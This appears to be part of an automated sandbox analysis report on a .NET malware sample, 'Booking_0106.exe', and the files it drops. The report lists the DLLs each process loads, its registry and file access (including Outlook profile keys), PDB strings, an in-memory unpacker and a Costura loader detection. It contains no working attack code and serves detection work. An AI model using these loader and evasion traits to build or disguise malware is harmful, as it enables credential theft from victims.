Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Section loaded: wintypes.dll

Source: C:\Users\user\Desktop\Booking_0106.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Booking_0106.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Booking_0106.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Booking_0106.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Booking_0106.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Booking_0106.exe

Static file information: File size 2002368 > 1048576

Source: Booking_0106.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1b6e00

Source: Booking_0106.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: System.pdb` source: WER6909.tmp.dmp.12.dr
Source:	Binary string: System.ni.pdbRSDS source: WER6909.tmp.dmp.12.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Booking_0106.exe, 00000000.00000002.1729847882.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1732460118.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1860595273.0000000003E89000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1860595273.0000000003C23000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1926073695.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1939658739.0000000003963000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbK source: doc-d.exe, 00000001.00000002.2269121553.0000000000851000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdbc source: doc-d.exe, 00000001.00000002.2269121553.0000000000851000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb8 source: WER6909.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbb source: doc-d.exe, 00000001.00000002.2269121553.0000000000851000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Booking_0106.exe, 00000000.00000002.1729847882.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1732460118.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1860595273.0000000003E89000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1860595273.0000000003C23000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1926073695.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1939658739.0000000003963000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Booking_0106.exe, 00000000.00000002.1729847882.00000000040C1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1731604116.00000000058F0000.00000004.08000000.00040000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1729847882.000000000419C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Net.Http.pdb source: doc-d.exe, 00000001.00000002.2269121553.0000000000894000.00000004.00000020.00020000.00000000.sdmp, doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp, WER6909.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Windows\dll\System.Net.Http.pdb source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb8 source: doc-d.exe, 00000001.00000002.2269121553.0000000000851000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER6909.tmp.dmp.12.dr
Source:	Binary string: protobuf-net.pdb source: Booking_0106.exe, 00000000.00000002.1729847882.00000000040C1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1731604116.00000000058F0000.00000004.08000000.00040000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1729847882.000000000419C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Net.Http.pdb source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: System.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: m0C:\Windows\mscorlib.pdb source: doc-d.exe, 00000001.00000002.2268824999.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER6909.tmp.dmp.12.dr
Source:	Binary string: System.Core.ni.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: C:\Windows\System.Net.Http.pdbpdbttp.pdb" source: doc-d.exe, 00000001.00000002.2269121553.0000000000810000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: %%.pdb source: doc-d.exe, 00000001.00000002.2268824999.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: doc-d.exe, 00000001.00000002.2269121553.0000000000894000.00000004.00000020.00020000.00000000.sdmp, WER6909.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: doc-d.exe, 00000001.00000002.2269121553.0000000000851000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Net.Http.pdb source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbJw source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Net.Http.ni.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: ~p.pdbk$ source: doc-d.exe, 00000001.00000002.2269121553.0000000000810000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: doc-d.exe, 00000001.00000002.2269121553.0000000000851000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\doc-d.PDB source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbK source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbF source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\doc-d.PDB source: doc-d.exe, 00000001.00000002.2268824999.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER6909.tmp.dmp.12.dr
Source:	Binary string: System.Net.Http.ni.pdbRSDS source: WER6909.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER6909.tmp.dmp.12.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER6909.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Net.Http.pdbI source: doc-d.exe, 00000001.00000002.2269121553.000000000087D000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: Booking_0106.exe, --.cs	.Net Code: _0003 System.AppDomain.Load(byte[])
Source: Booking_0106.exe, ---.cs	.Net Code: _0003
Source: 0.2.Booking_0106.exe.414c890.2.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.Booking_0106.exe.414c890.2.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.Booking_0106.exe.414c890.2.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.Booking_0106.exe.414c890.2.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.Booking_0106.exe.414c890.2.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.Booking_0106.exe.5960000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1731841032.0000000005960000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1926073695.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1842814784.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1711502008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Booking_0106.exe PID: 7532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ibrzb.exe PID: 7880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ibrzb.exe PID: 7276, type: MEMORYSTR

Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_014341E5 push ebx; ret	0_2_014342DA
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_0143C839 push 54056796h; ret	0_2_0143C845
